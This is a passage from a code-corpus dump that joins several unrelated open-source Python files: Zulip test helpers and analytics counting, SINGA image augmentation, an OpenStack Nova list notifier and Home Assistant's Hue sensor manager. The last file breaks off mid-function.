file = file_name
break
if not os.path.exists(file):
file = os.path.join(test_dir, file)
test_files.append(os.path.abspath(file))
if not test_files:
test_files = sorted(glob.glob(os.path.join(test_dir, '*.js')))
return test_files
def prepare_puppeteer_run() -> None:
os.chdir(ZULIP_PATH)
subprocess.check_call(['node', 'node_modules/puppeteer/install.js'])
os.makedirs('var/puppeteer', exist_ok=True)
for f in glob.glob('var/puppeteer/puppeteer-failure*.png'):
os.remove(f)
| shubhamdhama/zulip | tools/lib/test_script.py | Python | apache-2.0 | 3,557 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
'''
An utility model for image augmentation.
Example usage::
from singa import image_tool
tool = image_tool.ImageTool()
imgs = tool.load('input.png').\
resize_by_list([112]).crop5((96, 96), 5).enhance().flip().get()
for idx, img in enumerate(imgs):
img.save('%d.png' % idx)
'''
from __future__ import division
from builtins import range
from builtins import object
import random
import numpy as np
from PIL import Image, ImageEnhance
import math
def load_img(path, grayscale=False):
'''Read the image from a give path'''
img = Image.open(path)
if grayscale:
img = img.convert('L')
else: # Ensure 3 channel even when loaded image is grayscale
img = img.convert('RGB')
return img
def crop(img, patch, position):
'''Crop the input image into given size at given position.
Args:
patch(tuple): width and height of the patch
position(list(str)): left_top, left_bottom, right_top, right_bottom
and center.
'''
if img.size[0] < patch[0]:
raise Exception('img size[0] %d is smaller than patch[0]: %d'
% (img.size[0], patch[0]))
if img.size[1] < patch[1]:
raise Exception('img size[1] %d is smaller than patch[1]: %d'
% (img.size[1], patch[1]))
if position == 'left_top':
left, upper = 0, 0
elif position == 'left_bottom':
left, upper = 0, img.size[1]-patch[1]
elif position == 'right_top':
left, upper = img.size[0]-patch[0], 0
elif position == 'right_bottom':
left, upper = img.size[0]-patch[0], img.size[1]-patch[1]
elif position == 'center':
left, upper = (img.size[0]-patch[0]) // 2, (img.size[1]-patch[1]) // 2
else:
raise Exception('position is wrong')
box = (left, upper, left+patch[0], upper+patch[1])
new_img = img.crop(box)
# print "crop to box %d,%d,%d,%d" % box
return new_img
def crop_and_resize(img, patch, position):
'''Crop a max square patch of the input image at given position and resize
it into given size.
Args:
patch(tuple): width, height
position(list(str)): left, center, right, top, middle, bottom.
'''
size = img.size
if position == 'left':
left, upper = 0, 0
right, bottom = size[1], size[1]
elif position == 'center':
left, upper = (size[0]-size[1]) // 2, 0
right, bottom = (size[0]+size[1]) // 2, size[1]
elif position == 'right':
left, upper = size[0]-size[1], 0
right, bottom = size[0], size[1]
elif position == 'top':
left, upper = 0, 0
right, bottom = size[0], size[0]
elif position == 'middle':
left, upper = 0, (size[1]-size[0]) // 2
right, bottom = size[0], (size[1]+size[0]) // 2
elif position == 'bottom':
left, upper = 0, size[1]-size[0]
right, bottom = size[0], size[1]
else:
raise Exception('position is wrong')
box = (left, upper, right, bottom)
new_img = img.crop(box)
new_img = img.resize(patch, Image.BILINEAR)
# print box+crop
# print "crop to box %d,%d,%d,%d and scale to %d,%d" % (box+crop)
return new_img
def resize(img, small_size):
'''Resize the image to make the smaller side be at the given size'''
size = img.size
if size[0] < size[1]:
new_size = (small_size, int(small_size*size[1]/size[0]))
else:
new_size = (int(small_size*size[0]/size[1]), small_size)
new_img = img.resize(new_size, Image.BILINEAR)
# print 'resize to (%d,%d)' % new_size
return new_img
def color_cast(img, offset):
'''Add a random value from [-offset, offset] to each channel'''
x = np.asarray(img, dtype='uint8')
x.flags.writeable = True
cast_value = [0, 0, 0]
for i in range(3):
r = random.randint(0, 1)
if r:
cast_value[i] = random.randint(-offset, offset)
for w in range(x.shape[0]):
for h in range(x.shape[1]):
for c in range(3):
if cast_value[c] == 0:
continue
v = x[w][h][c]+cast_value[c]
if v < 0:
v = 0
if v > 255:
v = 255
x[w][h][c] = v
new_img = Image.fromarray(x.astype('uint8'), 'RGB')
return new_img
def enhance(img, scale):
'''Apply random enhancement for Color,Contrast,Brightness,Sharpness.
Args:
scale(float): enhancement degree is from [1-scale, 1+scale]
'''
enhance_value = [1.0, 1.0, 1.0, 1.0]
for i in range(4):
r = random.randint(0, 1)
if r:
enhance_value[i] = random.uniform(1-scale, 1+scale)
if not enhance_value[0] == 1.0:
enhancer = ImageEnhance.Color(img)
img = enhancer.enhance(enhance_value[0])
if not enhance_value[1] == 1.0:
enhancer = ImageEnhance.Contrast(img)
img = enhancer.enhance(enhance_value[1])
if not enhance_value[2] == 1.0:
enhancer = ImageEnhance.Brightness(img)
img = enhancer.enhance(enhance_value[2])
if not enhance_value[3] == 1.0:
enhancer = ImageEnhance.Sharpness(img)
img = enhancer.enhance(enhance_value[3])
return img
def flip(img):
# print 'flip'
new_img = img.transpose(Image.FLIP_LEFT_RIGHT)
return new_img
def flip_down(img):
# print 'flip_down'
new_img = img.transpose(Image.FLIP_TOP_BOTTOM)
return new_img
def get_list_sample(l, sample_size):
return [l[i] for i in sorted(random.sample(range(len(l)), sample_size))]
class ImageTool(object):
'''A tool for image augmentation.
For operations with inplace=True, the returned value is the ImageTool
instance self, which is for chaining multiple operations; Otherwise, the
preprocessed images would be returned.
For operations that has countable pre-processing cases, argument num_case
could be set to decide the number of pre-processing cases to apply.
Typically, it is set to 1 for training phases and to the max for test
phases.
'''
def __init__(self):
self.imgs = []
return
def load(self, path, grayscale=False):
img = load_img(path, grayscale)
self.imgs = [img]
return self
def set(self, imgs):
self.imgs = imgs
return self
def append(self, img):
self.imgs.append(img)
return self
def get(self):
return self.imgs
def num_augmentation(self):
'''Return the total number of augmentations to each image'''
pass
def resize_by_range(self, rng, inplace=True):
'''
Args:
rng: a tuple (begin,end), include begin, exclude end
inplace: inplace imgs or not ( return new_imgs)
'''
size_list = list(range(rng[0], rng[1]))
return self.resize_by_list(size_list, 1, inplace)
def resize_by_list(self, size_list, num_case=1, inplace=True):
'''
Args:
num_case: num of resize cases, must be <= the length of size_list
inplace: inplace imgs or not ( return new_imgs)
'''
new_imgs = []
if num_case < 1 or num_case > len(size_list):
raise Exception(
'num_case must be smaller in [0,%d(length of size_list)]' %
len(size_list))
for img in self.imgs:
if num_case == len(size_list):
small_sizes = size_list
else:
small_sizes = get_list_sample(size_list, num_case)
for small_size in small_sizes:
new_img = resize(img, small_size)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def rotate_by_range(self, rng, inplace=True):
'''
Args:
rng: a tuple (begin,end) in degree, include begin, exclude end
inplace: inplace imgs or not ( return new_imgs)
'''
angle_list = list(range(rng[0], rng[1]))
return self.rotate_by_list(angle_list, 1, inplace)
def rotate_by_list(self, angle_list, num_case=1, inplace=True):
'''
Args:
num_case: num of rotate cases, must be <= the length of angle_list
inplace: inplace imgs or not ( return new_imgs)
'''
new_imgs = []
if num_case < 1 or num_case > len(angle_list):
raise Exception(
'num_case must be smaller in [1,%d(length of angle_list)]' %
len(angle_list))
for img in self.imgs:
if num_case == len(angle_list):
angles = angle_list
else:
angles = get_list_sample(angle_list, num_case)
for angle in angles:
new_img = img.rotate(angle)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def crop5(self, patch, num_case=1, inplace=True):
'''Crop at positions from [left_top, left_bottom, right_top,
right_bottom, and center].
Args:
patch(tuple): width and height of the result image.
num_case: num of cases, must be in [1,5]
inplace: inplace imgs or not ( return new_imgs)
'''
new_imgs = []
positions = [
"left_top",
"left_bottom",
"right_top",
"right_bottom",
"center"]
if num_case > 5 or num_case < 1:
raise Exception('num_case must be in [1,5]')
for img in self.imgs:
if num_case > 0 and num_case < 5:
positions = get_list_sample(positions, num_case)
for position in positions:
new_img = crop(img, patch, position)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def crop3(self, patch, num_case=1, inplace=True):
'''Crop a max square patch of the input image at given position and
scale it into given size.
According to img size, crop position could be either
(left, center, right) or (top, middle, bottom).
Args:
patch(tuple): the width and height the output image
num_case: num of cases, must be in [1,3]
inplace: inplace imgs or not ( return new_imgs)
'''
if not patch[0] == patch[1]:
raise Exception('patch must be a square')
new_imgs = []
if num_case > 3 or num_case < 1:
raise Exception('num_case must be in [1,3]')
positions_horizental = ["left", "center", "right"]
positions_vertical = ["top", "middle", "bottom"]
for img in self.imgs:
size = img.size
if size[0] > size[1]:
if num_case > 0 and num_case < 3:
positions = get_list_sample(positions_horizental, num_case)
else:
positions = positions_horizental
else:
if num_case > 0 and num_case < 3:
positions = get_list_sample(positions_vertical, num_case)
else:
positions = positions_vertical
for position in positions:
new_img = crop_and_resize(img, patch, position)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def crop8(self, patch, num_case=1, inplace=True):
'''This is a union of patch_5 and patch_and_scale.
You can follow this example to union any num of cases of imgtool methods
'''
patch5 = 5
patch3 = 3
if num_case < 1 or num_case > patch5 + patch3:
raise Exception(
'num_case must be in [0,%d]' % (patch5+patch3))
if num_case == patch5 + patch3:
count = patch5
else:
sample_list = list(range(0, patch5 + patch3))
samples = get_list_sample(sample_list, num_case)
count = 0
for s in samples:
if s < patch5:
count += 1
new_imgs = []
if count > 0:
new_imgs += self.crop5(patch, count, False)
if num_case-count > 0:
new_imgs += self.crop3(patch, num_case-count, False)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def random_crop(self, patch, inplace=True):
'''Crop the image at random offset to get a patch of the given size.
Args:
patch(tuple): width and height of the patch
inplace(Boolean): replace the internal images list with the patches
if True; otherwise, return the patches.
'''
new_imgs = []
for img in self.imgs:
assert img.size[0] >= patch[0] and img.size[1] >= patch[1],\
'img size (%d, %d), patch size (%d, %d)' % \
(img.size[0], img.size[1], patch[0], patch[1])
left_offset = random.randint(0, img.size[0] - patch[0])
top_offset = random.randint(0, img.size[1] - patch[1])
box = (left_offset, top_offset,
left_offset + patch[0], top_offset + patch[1])
new_imgs.append(img.crop(box))
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def random_crop_resize(self, patch, inplace=True):
''' Crop of the image at a random size between 0.08 to 1 of input image
and random aspect ratio between 3/4 to 4/3.
This crop is then resized to the given patch size.
Args:
patch(tuple): width and height of the patch
inplace(Boolean): replace the internal images list with the patches
if True; otherwise, return the patches.
'''
new_imgs = []
for img in self.imgs:
area = img.size[0]*img.size[1]
img_resized = None
for attempt in range(10):
target_area = random.uniform(0.08, 1.0) * area
aspect_ratio = random.uniform(3. / 4, 4. / 3)
crop_x = int(round(math.sqrt(target_area * aspect_ratio)))
crop_y = int(round(math.sqrt(target_area / aspect_ratio)))
if img.size[0] > crop_x and img.size[1] > crop_y:
left_offset = random.randint(0, img.size[0] - crop_x)
top_offset = random.randint(0, img.size[1] - crop_y)
box = (left_offset, top_offset, left_offset + crop_x,
top_offset + crop_y)
img_croped = img.crop(box)
img_resized = img_croped.resize(patch, Image.BILINEAR)
break
if img_resized is None:
img_resized = img.resize(patch, Image.BILINEAR)
new_imgs.append(img_resized)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def flip(self, num_case=1, inplace=True):
'''Randomly flip a img left to right.
Args:
num_case: num of cases, must be in {1,2}; if 2, then add the orignal
and flipped img
inplace: inplace imgs or not (return new_imgs)
'''
new_imgs = []
for img in self.imgs:
if num_case == 1:
if random.randint(0, 1):
new_imgs.append(flip(img))
else:
new_imgs.append(img)
elif num_case == 2:
new_imgs.append(flip(img))
new_imgs.append(img)
else:
raise Exception('num_case must be in [0,2]')
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def flip_down(self, num_case=1, inplace=True):
'''Randomly flip a img top to bottom.
Args:
num_case: num of cases, must be in {1,2}; if 2, then add the orignal
and flip_down img
inplace: inplace imgs or not (return new_imgs)
'''
new_imgs = []
for img in self.imgs:
if num_case == 1:
if random.randint(0, 1):
new_imgs.append(flip_down(img))
else:
new_imgs.append(img)
elif num_case == 2:
new_imgs.append(flip_down(img))
new_imgs.append(img)
else:
raise Exception('num_case must be in [0,2]')
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def color_cast(self, offset=20, inplace=True):
'''Add a random value from [-offset, offset] to each channel
Args:
offset: cast offset, >0 and <255
inplace: inplace imgs or not ( return new_imgs)
'''
new_imgs = []
if offset < 0 or offset > 255:
raise Exception('offset must be >0 and <255')
for img in self.imgs:
new_img = color_cast(img, offset)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
def enhance(self, scale=0.2, inplace=True):
'''Apply random enhancement for Color,Contrast,Brightness,Sharpness.
Args:
scale(float): enhancement degree is from [1-scale, 1+scale]
inplace: inplace imgs or not ( return new_imgs)
'''
new_imgs = []
for img in self.imgs:
new_img = enhance(img, scale)
new_imgs.append(new_img)
if inplace:
self.imgs = new_imgs
return self
else:
return new_imgs
if __name__ == '__main__':
tool = ImageTool()
imgs = tool.load('input.png').\
resize_by_list([112]).crop5((96, 96), 5).enhance().flip().get()
for idx, img in enumerate(imgs):
img.save('%d.png' % idx)
| kaiping/incubator-singa | python/singa/image_tool.py | Python | apache-2.0 | 19,335 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import log as logging
from nova import utils
from nova.exception import ClassNotFound
flags.DEFINE_multistring('list_notifier_drivers',
['nova.notifier.no_op_notifier'],
'List of drivers to send notifications')
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.notifier.list_notifier')
drivers = None
class ImportFailureNotifier(object):
"""Noisily re-raises some exception over-and-over when notify is called."""
def __init__(self, exception):
self.exception = exception
def notify(self, message):
raise self.exception
def _get_drivers():
"""Instantiates and returns drivers based on the flag values."""
global drivers
if not drivers:
drivers = []
for notification_driver in FLAGS.list_notifier_drivers:
try:
drivers.append(utils.import_object(notification_driver))
except ClassNotFound as e:
drivers.append(ImportFailureNotifier(e))
return drivers
def notify(message):
"""Passes notification to mulitple notifiers in a list."""
for driver in _get_drivers():
try:
driver.notify(message)
except Exception as e:
LOG.exception(_("Problem '%(e)s' attempting to send to "
"notification driver %(driver)s." % locals()))
def _reset_drivers():
"""Used by unit tests to reset the drivers."""
global drivers
drivers = None
| 30loops/nova | nova/notifier/list_notifier.py | Python | apache-2.0 | 2,145 |
"""Support for the Philips Hue sensors as a platform."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
from aiohue import AiohueException, Unauthorized
from aiohue.v1.sensors import TYPE_ZLL_PRESENCE
import async_timeout
from homeassistant.components.sensor import SensorStateClass
from homeassistant.core import callback
from homeassistant.helpers import debounce, entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from ..const import REQUEST_REFRESH_DELAY
from .helpers import remove_devices
from .hue_event import EVENT_CONFIG_MAP
from .sensor_device import GenericHueDevice
SENSOR_CONFIG_MAP: dict[str, Any] = {}
LOGGER = logging.getLogger(__name__)
def _device_id(aiohue_sensor):
# Work out the shared device ID, as described below
device_id = aiohue_sensor.uniqueid
if device_id and len(device_id) > 23:
device_id = device_id[:23]
return device_id
class SensorManager:
"""Class that handles registering and updating Hue sensor entities.
Intended to be a singleton.
"""
SCAN_INTERVAL = timedelta(seconds=5)
def __init__(self, bridge):
"""Initialize the sensor manager."""
self.bridge = bridge
self._component_add_entities = {}
self.current = {}
self.current_events = {}
self._enabled_platforms = ("binary_sensor", "sensor")
self.coordinator = DataUpdateCoordinator(
bridge.hass,
LOGGER,
name="sensor",
update_method=self.async_update_data,
update_interval=self.SCAN_INTERVAL,
request_refresh_debouncer=debounce.Debouncer(
bridge.hass, LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
async def async_update_data(self):
"""Update sensor data."""
try:
async with async_timeout.timeout(4):
return await self.bridge.async_request_call(
self.bridge.api.sensors.update
)
except Unauthorized as err:
await self.bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
async def async_register_component(self, platform, async_add_entities):
"""Register async_add_entities methods for components."""
self._component_add_entities[platform] = async_add_entities
if len(self._component_add_entities) < len(self._enabled_platforms):
LOGGER.debug("Aborting start with %s, waiting for the rest", platform)
return
# We have all components available, start the updating.
self.bridge.reset_jobs.append(
self.coordinator.async_add_listener(self.async_update_items)
)
await self.coordinator.async_refresh()
@callback
def async_update_items(self):
"""Update sensors from the bridge."""
api = self.bridge.api.sensors
if len(self._component_add_entities) < len(self._enabled_platforms):
return
to_add = {}
primary_sensor_devices = {}
current = self.current
# Physical Hue motion sensors present as three sensors in the API: a
# presence sensor, a temperature sensor, and a light level sensor. Of
# these, only the presence sensor is assigned the user-friendly name
# that the user has given to the device. Each of these sensors is
# linked by a common device_id, which is the first twenty-three
# characters of the unique id (then followed by a hyphen and an ID
# specific to the individual sensor).
#
# To set up neat values, and assign the sensor entities to the same
# device, we first, iterate over all the sensors and find the Hue
# presence sensors, then iterate over all the remaining sensors -
# finding the remaining ones that may or may not be related to the
# presence sensors.
for item_id in api:
if api[item_id].type != TYPE_ZLL_PRESENCE:
continue
primary_sensor_devices[_device_id(api[item_id])] = api[item_id]
# Iterate again now we have all the presence sensors, and add the
# related sensors with nice names where appropriate.
for item_id in api:
uniqueid = api[item_id].uniqueid
if current.get(uniqueid, self.current_events.get(uniqueid)) is not None:
continue
sensor_type = api[item_id].type
# Check for event generator devices
event_config = EVENT_CONFIG_MAP.get(sensor_type)
if event_config is not None:
base_name = api[item_id].name
name = event_config["name_format"].format(base_name)
new_event = event_config["class"](api[item_id], name, self.bridge)
self.bridge.hass.async_create_task(
new_event.async_update_device_registry()
)
self.current_events[uniqueid] = new_event
sensor_config = SENSOR_CONFIG_MAP.get(sensor_type)
if sensor_config is None:
continue
base_name = api[item_id].name
primary_sensor = primary_sensor_devices.get(_device_id(api[item_id]))
if primary_sensor is not None:
base_name = primary_sensor.name
name = sensor_config["name_format"].format(base_name)
current[uniqueid] = sensor_config["class"](
api[item_id], name, self.bridge, primary_sensor=primary_sensor
)
to_add.setdefault(sensor_config["platform"], []).append(current[uniqueid])
self.bridge.hass.async_create_task(
remove_devices(
self.bridge,
[value.uniqueid for value in api.values()],
current,
)
)
for platform, value in to_add.items():
self._component_add_entities[platform](value)
class GenericHueSensor(GenericHueDevice, entity.Entity):
"""Representation of a Hue sensor."""
should_poll = False
@property
def available(self):
"""Return if sensor is available."""
return self.bridge.sensor_manager.coordinator.last_update_success and (
self.allow_unreachable
# remotes like Hue Tap (ZGPSwitchSensor) have no _reachability_
or self.sensor.config.get("reachable", True)
)
@property
def state_class(self):
"""Return the state class of this entity, from STATE_CLASSES, if any."""
return SensorStateClass.MEASUREMENT
async def async_added_to_hass(self):
"""When entity is added to hass."""
await super().async_added_to_hass()
self.async_on_remove(
self.bridge.sensor_manager.coordinator.async_add_listener(
self.async_write_ha_state
)
)
async def async_update(self):
"""Update the entity.
Only used by the generic entity update service.
"""
await self.bridge.sensor_manager.coordinator.async_request_refresh()
class GenericZLLSensor(GenericHueSensor):
"""Representation of a Hue-brand, physical sensor."""
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
return {"battery_level": self.sensor.battery}
| home-assistant/home-assistant | homeassistant/components/hue/v1/sensor_base.py | Python | apache-2.0 | 7,575 |
import logging
import time
from collections import OrderedDict, defaultdict
from datetime import datetime, timedelta
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
from django.conf import settings
from django.db import connection
from django.db.models import F
from psycopg2.sql import SQL, Composable, Identifier, Literal
from analytics.models import (
BaseCount,
FillState,
InstallationCount,
RealmCount,
StreamCount,
UserCount,
installation_epoch,
last_successful_fill,
)
from zerver.lib.logging_util import log_to_file
from zerver.lib.timestamp import ceiling_to_day, ceiling_to_hour, floor_to_hour, verify_UTC
from zerver.models import (
Message,
Realm,
RealmAuditLog,
Stream,
UserActivityInterval,
UserProfile,
models,
)
## Logging setup ##
logger = logging.getLogger('zulip.management')
log_to_file(logger, settings.ANALYTICS_LOG_PATH)
# You can't subtract timedelta.max from a datetime, so use this instead
TIMEDELTA_MAX = timedelta(days=365*1000)
## Class definitions ##
class CountStat:
HOUR = 'hour'
DAY = 'day'
FREQUENCIES = frozenset([HOUR, DAY])
def __init__(self, property: str, data_collector: 'DataCollector', frequency: str,
interval: Optional[timedelta]=None) -> None:
self.property = property
self.data_collector = data_collector
# might have to do something different for bitfields
if frequency not in self.FREQUENCIES:
raise AssertionError(f"Unknown frequency: {frequency}")
self.frequency = frequency
if interval is not None:
self.interval = interval
elif frequency == CountStat.HOUR:
self.interval = timedelta(hours=1)
else: # frequency == CountStat.DAY
self.interval = timedelta(days=1)
def __str__(self) -> str:
return f"<CountStat: {self.property}>"
class LoggingCountStat(CountStat):
def __init__(self, property: str, output_table: Type[BaseCount], frequency: str) -> None:
CountStat.__init__(self, property, DataCollector(output_table, None), frequency)
class DependentCountStat(CountStat):
def __init__(self, property: str, data_collector: 'DataCollector', frequency: str,
interval: Optional[timedelta] = None, dependencies: Sequence[str] = []) -> None:
CountStat.__init__(self, property, data_collector, frequency, interval=interval)
self.dependencies = dependencies
class DataCollector:
def __init__(self, output_table: Type[BaseCount],
pull_function: Optional[Callable[[str, datetime, datetime, Optional[Realm]], int]]) -> None:
self.output_table = output_table
self.pull_function = pull_function
## CountStat-level operations ##
def process_count_stat(stat: CountStat, fill_to_time: datetime,
realm: Optional[Realm]=None) -> None:
# TODO: The realm argument is not yet supported, in that we don't
# have a solution for how to update FillState if it is passed. It
# exists solely as partial plumbing for when we do fully implement
# doing single-realm analytics runs for use cases like data import.
#
# Also, note that for the realm argument to be properly supported,
# the CountStat object passed in needs to have come from
# E.g. get_count_stats(realm), i.e. have the realm_id already
# entered into the SQL query defined by the CountState object.
if stat.frequency == CountStat.HOUR:
time_increment = timedelta(hours=1)
elif stat.frequency == CountStat.DAY:
time_increment = timedelta(days=1)
else:
raise AssertionError(f"Unknown frequency: {stat.frequency}")
verify_UTC(fill_to_time)
if floor_to_hour(fill_to_time) != fill_to_time:
raise ValueError(f"fill_to_time must be on an hour boundary: {fill_to_time}")
fill_state = FillState.objects.filter(property=stat.property).first()
if fill_state is None:
currently_filled = installation_epoch()
fill_state = FillState.objects.create(property=stat.property,
end_time=currently_filled,
state=FillState.DONE)
logger.info("INITIALIZED %s %s", stat.property, currently_filled)
elif fill_state.state == FillState.STARTED:
logger.info("UNDO START %s %s", stat.property, fill_state.end_time)
do_delete_counts_at_hour(stat, fill_state.end_time)
currently_filled = fill_state.end_time - time_increment
do_update_fill_state(fill_state, currently_filled, FillState.DONE)
logger.info("UNDO DONE %s", stat.property)
elif fill_state.state == FillState.DONE:
currently_filled = fill_state.end_time
else:
raise AssertionError(f"Unknown value for FillState.state: {fill_state.state}.")
if isinstance(stat, DependentCountStat):
for dependency in stat.dependencies:
dependency_fill_time = last_successful_fill(dependency)
if dependency_fill_time is None:
logger.warning("DependentCountStat %s run before dependency %s.",
stat.property, dependency)
return
fill_to_time = min(fill_to_time, dependency_fill_time)
currently_filled = currently_filled + time_increment
while currently_filled <= fill_to_time:
logger.info("START %s %s", stat.property, currently_filled)
start = time.time()
do_update_fill_state(fill_state, currently_filled, FillState.STARTED)
do_fill_count_stat_at_hour(stat, currently_filled, realm)
do_update_fill_state(fill_state, currently_filled, FillState.DONE)
end = time.time()
currently_filled = currently_filled + time_increment
logger.info("DONE %s (%dms)", stat.property, (end-start)*1000)
def do_update_fill_state(fill_state: FillState, end_time: datetime, state: int) -> None:
fill_state.end_time = end_time
fill_state.state = state
fill_state.save()
# We assume end_time is valid (e.g. is on a day or hour boundary as appropriate)
# and is timezone aware. It is the caller's responsibility to enforce this!
def do_fill_count_stat_at_hour(stat: CountStat, end_time: datetime, realm: Optional[Realm]=None) -> None:
start_time = end_time - stat.interval
if not isinstance(stat, LoggingCountStat):
timer = time.time()
assert(stat.data_collector.pull_function is not None)
rows_added = stat.data_collector.pull_function(stat.property, start_time, end_time, realm)
logger.info("%s run pull_function (%dms/%sr)",
stat.property, (time.time()-timer)*1000, rows_added)
do_aggregate_to_summary_table(stat, end_time, realm)
def do_delete_counts_at_hour(stat: CountStat, end_time: datetime) -> None:
if isinstance(stat, LoggingCountStat):
InstallationCount.objects.filter(property=stat.property, end_time=end_time).delete()
if stat.data_collector.output_table in [UserCount, StreamCount]:
RealmCount.objects.filter(property=stat.property, end_time=end_time).delete()
else:
UserCount.objects.filter(property=stat.property, end_time=end_time).delete()
StreamCount.objects.filter(property=stat.property, end_time=end_time).delete()
RealmCount.objects.filter(property=stat.property, end_time=end_time).delete()
InstallationCount.objects.filter(property=stat.property, end_time=end_time).delete()
def do_aggregate_to_summary_table(stat: CountStat, end_time: datetime,
realm: Optional[Realm]=None) -> None:
cursor = connection.cursor()
# Aggregate into RealmCount
output_table = stat.data_collector.output_table
if realm is not None:
realm_clause = SQL("AND zerver_realm.id = {}").format(Literal(realm.id))
else:
realm_clause = SQL("")
if output_table in (UserCount, StreamCount):
realmcount_query = SQL("""
INSERT INTO analytics_realmcount
(realm_id, value, property, subgroup, end_time)
SELECT
zerver_realm.id, COALESCE(sum({output_table}.value), 0), %(property)s,
{output_table}.subgroup, %(end_time)s
FROM zerver_realm
JOIN {output_table}
ON
zerver_realm.id = {output_table}.realm_id
WHERE
{output_table}.property = %(property)s AND
{output_table}.end_time = %(end_time)s
{realm_clause}
GROUP BY zerver_realm.id, {output_table}.subgroup
""").format(
output_table=Identifier(output_table._meta.db_table),
realm_clause=realm_clause,
)
start = time.time()
cursor.execute(realmcount_query, {
'property': stat.property,
'end_time': end_time,
})
end = time.time()
logger.info(
"%s RealmCount aggregation (%dms/%sr)",
stat.property, (end - start) * 1000, cursor.rowcount,
)
if realm is None:
# Aggregate into InstallationCount. Only run if we just
# processed counts for all realms.
#
# TODO: Add support for updating installation data after
# changing an individual realm's values.
installationcount_query = SQL("""
INSERT INTO analytics_installationcount
(value, property, subgroup, end_time)
SELECT
sum(value), %(property)s, analytics_realmcount.subgroup, %(end_time)s
FROM analytics_realmcount
WHERE
property = %(property)s AND
end_time = %(end_time)s
GROUP BY analytics_realmcount.subgroup
""")
start = time.time()
cursor.execute(installationcount_query, {
'property': stat.property,
'end_time': end_time,
})
end = time.time()
logger.info(
"%s InstallationCount aggregation (%dms/%sr)",
stat.property, (end - start) * 1000, cursor.rowcount,
)
cursor.close()
## Utility functions called from outside counts.py ##
# called from zerver/lib/actions.py; should not throw any errors
def do_increment_logging_stat(zerver_object: Union[Realm, UserProfile, Stream], stat: CountStat,
subgroup: Optional[Union[str, int, bool]], event_time: datetime,
increment: int=1) -> None:
if not increment:
return
table = stat.data_collector.output_table
if table == RealmCount:
id_args = {'realm': zerver_object}
elif table == UserCount:
id_args = {'realm': zerver_object.realm, 'user': zerver_object}
else: # StreamCount
id_args = {'realm': zerver_object.realm, 'stream': zerver_object}
if stat.frequency == CountStat.DAY:
end_time = ceiling_to_day(event_time)
else: # CountStat.HOUR:
end_time = ceiling_to_hour(event_time)
row, created = table.objects.get_or_create(
property=stat.property, subgroup=subgroup, end_time=end_time,
defaults={'value': increment}, **id_args)
if not created:
row.value = F('value') + increment
row.save(update_fields=['value'])
def do_drop_all_analytics_tables() -> None:
UserCount.objects.all().delete()
StreamCount.objects.all().delete()
RealmCount.objects.all().delete()
InstallationCount.objects.all().delete()
FillState.objects.all().delete()
def do_drop_single_stat(property: str) -> None:
UserCount.objects.filter(property=property).delete()
StreamCount.objects.filter(property=property).delete()
RealmCount.objects.filter(property=property).delete()
InstallationCount.objects.filter(property=property).delete()
FillState.objects.filter(property=property).delete()
## DataCollector-level operations ##
QueryFn = Callable[[Dict[str, Composable]], Composable]
def do_pull_by_sql_query(
property: str,
start_time: datetime,
end_time: datetime,
query: QueryFn,
group_by: Optional[Tuple[models.Model, str]],
) -> int:
if group_by is None:
subgroup = SQL('NULL')
group_by_clause = SQL('')
else:
subgroup = Identifier(group_by[0]._meta.db_table, group_by[1])
group_by_clause = SQL(', {}').format(subgroup)
# We do string replacement here because cursor.execute will reject a
# group_by_clause given as a param.
# We pass in the datetimes as params to cursor.execute so that we don't have to
# think about how to convert python datetimes to SQL datetimes.
query_ = query({
'subgroup': subgroup,
'group_by_clause': group_by_clause,
})
cursor = connection.cursor()
cursor.execute(query_, {
'property': property,
'time_start': start_time,
'time_end': end_time,
})
rowcount = cursor.rowcount
cursor.close()
return rowcount
def sql_data_collector(
output_table: Type[BaseCount],
query: QueryFn,
group_by: Optional[Tuple[models.Model, str]],
) -> DataCollector:
def pull_function(property: str, start_time: datetime, end_time: datetime,
realm: Optional[Realm] = None) -> int:
# The pull function type needs to accept a Realm argument
# because the 'minutes_active::day' CountStat uses
# DataCollector directly for do_pull_minutes_active, which
# requires the realm argument. We ignore it here, because the
# realm should have been already encoded in the `query` we're
# passed.
return do_pull_by_sql_query(property, start_time, end_time, query, group_by)
return DataCollector(output_table, pull_function)
def do_pull_minutes_active(property: str, start_time: datetime, end_time: datetime,
realm: Optional[Realm] = None) -> int:
